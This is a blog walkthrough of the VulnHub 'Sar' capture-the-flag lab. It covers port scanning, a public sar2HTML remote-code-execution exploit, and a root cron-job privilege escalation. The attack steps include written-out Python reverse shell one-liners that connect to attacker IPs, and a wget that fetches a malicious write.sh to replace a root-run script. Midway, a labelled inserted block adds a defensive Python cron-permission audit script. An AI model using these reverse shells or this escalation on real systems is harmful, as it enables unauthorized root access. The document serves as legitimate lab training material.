Sar(vulnhub) — Walkthrough | OSCP like lab | OSCP prep

ryotsu
6 min read · Jun 10, 2021

Hello hackers, first of all I would like to tell you that this is the first blog I am writing, so there may be mistakes; please give me your valuable review.

Link: https://www.vulnhub.com/entry/sar-1,425/

Sar is a vulnerable machine available on VulnHub and in the Offensive Security labs; it is created to give you the experience of real-world penetration testing.

So Let’s HACK IT like a 733T.

-Port or Network Scanning-

So, I started with a simple nmap scan to find the open ports, services and OS on the machine.

root@hackit:# nmap -sV -O 192.168.219.35
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-10 11:51 EDT
Nmap scan report for 192.168.219.35
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Here we got the open ports, ssh (22) and http (80), so let's enumerate http (port 80).

A simple Apache2 web server is running on port 80 with the default Apache2 page.

Then I used gobuster to find hidden directories and was able to find the robots.txt file.

root@hackit:# gobuster dir -u http://192.168.219.35 -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.219.35
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/10 12:18:06 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 9]
/index.html (Status: 200) [Size: 10918]

I opened robots.txt. It contained a single entry named sar2HTML.

I opened the sar2HTML directory and found a web application, which seemed interesting.

The best part here is that we have the name and version of the web application on the web page; this is useful because we can search for publicly available exploits or vulnerabilities.

-Exploitation and Gaining Access-

I searched for exploits and fortunately found an Exploit-DB entry; according to Exploit-DB, the installed application is vulnerable to remote code execution.

Exploit link: https://www.exploit-db.com/exploits/49344

Note: the exploit is written in Python, so save it with a .py extension.

After downloading the exploit I executed it with Python in my terminal. It asked for a URL; after entering the URL we got remote code execution.

root@hackit:# python3 sar_exploit.py 
Enter The url => http://192.168.219.35/sar2HTML/index.php?plot=HPUX
Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILE
Command => id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

It was time to get a reverse shell out of this. I checked whether Python was installed or not, and it turns out we can utilize Python3 to get a connection back. Here’s what I used:

Command => python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.54",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

You can find more interesting reverse shells on:

After that I opened my Netcat listener and got the shell.

Now let's make the shell more stable using python3 -c "import pty;pty.spawn('/bin/bash')".

Then let's find our local.txt or user flag.

$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@sar:/var/www/html/sar2HTML$ ls
ls
LICENSE index.php sar2html sarDATA sarFILE
www-data@sar:/var/www/html/sar2HTML$ cd /home
cd /home
www-data@sar:/home$ ls
ls
local.txt love
www-data@sar:/home$ cat local.txt
cat local.txt
YOUR FLAG WILL BE HERE
www-data@sar:/home$

Offensive Security lab users will get the flag here, but for VulnHub users the location of the flag is:

www-data@sar:/home$ cd love
www-data@sar:/home/love$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
www-data@sar:/home/love$ cd Desktop
www-data@sar:/home/love/Desktop$ ls
user.txt
www-data@sar:/home/love/Desktop$ cat user.txt
YOUR FLAG WILL BE HERE
www-data@sar:/home/love/Desktop$

Privilege Escalation

Now it's time for one of my favourite parts. Let's transfer the linpeas script to this machine using an HTTP server to enumerate for privilege escalation.

Link for the tool: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

The best thing about this tool is that it shows all the possible vectors, so you don’t have to read through hundreds of lines and commands.

On the attacker machine I opened a local HTTP server on port 3333 using python3 -m http.server 3333.

root@hackit:~[/privilege-escalation-awesome-scripts-suite/linPEAS]# python3 -m http.server 3333

Let's download the script on the vulnerable machine.

www-data@sar:/home/love/Desktop$ cd /tmp
www-data@sar:/tmp$ wget http://192.168.49.219:3333/linpeas.sh
--2021-06-10 17:25:44-- http://192.168.49.219:3333/linpeas.sh
Connecting to 192.168.49.219:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 319985 (312K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 312.49K 278KB/s in 1.1s
2021-06-10 17:25:46 (278 KB/s) - 'linpeas.sh' saved [319985/319985]
www-data@sar:/tmp$ chmod +x linpeas.sh

www-data@sar:/tmp$ ./linpeas.sh
./linpeas.sh
Starting linpeas. Caching Writable Folders...
****skipped****
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root

Here we see that a cron job runs every 5 minutes as root and executes the finally.sh shell script in the /var/www/html directory.

Now let's go and see what finally.sh is. Unfortunately we do not have write permission on finally.sh, i.e. we cannot edit it, but finally.sh executes a file write.sh, and we are able to edit that file because we have write permission on it.
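The misconfiguration found above (a root cron job running a script that in turn calls a world-writable script) is easy to catch with a periodic audit. The following is an added example, not part of the original write-up: a small Python check that parses /etc/crontab-style jobs, resolves the scripts they run, follows one level of script-calls-script, and flags any file that is group- or world-writable. The contents of finally.sh and the temporary directory that stands in for the box are constructed assumptions.

```python
import os
import re
import tempfile
# Constructed sample in /etc/crontab format, mirroring the job linpeas reported on this box.
SAMPLE_CRONTAB = """SHELL=/bin/sh
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
"""
JOB_RE = re.compile(r"^(?:\S+\s+){5}(\S+)\s+(.+)$")      # five schedule fields, user, command
CD_RE = re.compile(r"\bcd\s+(\S+)")                       # working directory set in the text
SCRIPT_RE = re.compile(r"(?<![\w/.-])([\w./-]*\.sh)\b")   # every *.sh token that gets invoked
GROUP_OR_WORLD_WRITE = 0o022                              # the permission bits that matter here

def resolve_scripts(text, cwd, fs_root):
    """Real paths of the *.sh files text refers to; a 'cd DIR' inside text overrides cwd."""
    m = CD_RE.search(text)
    if m:
        cwd = os.path.join(fs_root, m.group(1).lstrip("/"))
    return [os.path.normpath(os.path.join(fs_root, s.lstrip("/")) if s.startswith("/")
                             else os.path.join(cwd, s)) for s in SCRIPT_RE.findall(text)]

def writable_by_non_root(path):
    """True if group or world may write the file, i.e. any local user can replace its contents."""
    return os.path.isfile(path) and bool(os.stat(path).st_mode & GROUP_OR_WORLD_WRITE)

def audit(crontab_text, fs_root="/"):
    """Scripts run by root cron jobs, and the scripts they call, that a non-root user can edit."""
    findings = []
    for line in crontab_text.splitlines():
        m = JOB_RE.match(line.strip())
        if not m or line.lstrip().startswith("#") or m.group(1) != "root":
            continue
        for script in resolve_scripts(m.group(2), fs_root, fs_root):
            if writable_by_non_root(script):
                findings.append(script)
            body = open(script).read() if os.path.isfile(script) else ""   # finally.sh -> write.sh
            for child in resolve_scripts(body, os.path.dirname(script), fs_root):
                if writable_by_non_root(child) and child not in findings:
                    findings.append(child)
    return findings

def build_sample_fs():
    """Constructed stand-in for the box: finally.sh root-only, write.sh mode 777 (contents assumed)."""
    root = tempfile.mkdtemp()
    html = os.path.join(root, "var/www/html")
    os.makedirs(html)
    for name, body, mode in (("finally.sh", "#!/bin/bash\n./write.sh\n", 0o755),
                             ("write.sh", "#!/bin/bash\necho placeholder\n", 0o777)):
        open(os.path.join(html, name), "w").write(body)
        os.chmod(os.path.join(html, name), mode)
    return root
```

On a real host, call audit(open("/etc/crontab").read()) with the default fs_root; files under /etc/cron.d use the same six-field format and can be fed in the same way.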

Now let's replace this write.sh with our reverse shell script, which will give us a reverse connection as root.

So I created a file with the same Python reverse shell I used above.

Note: you can use any reverse shell; above I gave you the link to many reverse shells.

root@hackit:# cat write.sh
#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.219",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And transferred it using the same HTTP server.

www-data@sar:/var/www/html$ rm write.sh
www-data@sar:/var/www/html$ wget http://192.168.49.219:3334/write.sh

--2021-06-10 17:47:15-- http://192.168.49.219:3334/write.sh
Connecting to 192.168.49.219:3334... connected.
HTTP request sent, awaiting response... 200 OK
Length: 245 [text/x-sh]
Saving to: 'write.sh'
write.sh 100%[===================>] 245 --.-KB/s in 0.002s
2021-06-10 17:47:16 (130 KB/s) - 'write.sh' saved [245/245]
www-data@sar:/var/www/html$ chmod 777 write.sh

www-data@sar:/var/www/html$

After approximately 5 minutes I got my reverse connection as root.

Now let's get the root flag.

root@sar:/var/www/html# whoami
root
root@sar:/var/www/html# cd /root
root@sar:~# ls
proof.txt root.txt
root@sar:~# cat proof.txt
YOUR ROOT FLAG WILL BE HERE
root@sar:~#

And with this you have pwned the machine.

Thank you for taking the time to read this walkthrough. If you found it helpful, please hit the 👏 button and share it with others. If you have any doubt, kindly ask in the comments, and please give your feedback in the comments.

For queries and feedback you can also find me on Twitter: https://twitter.com/ryotsu_sec

ryotsu

I am a techie interested in cyber security | OSCP aspirant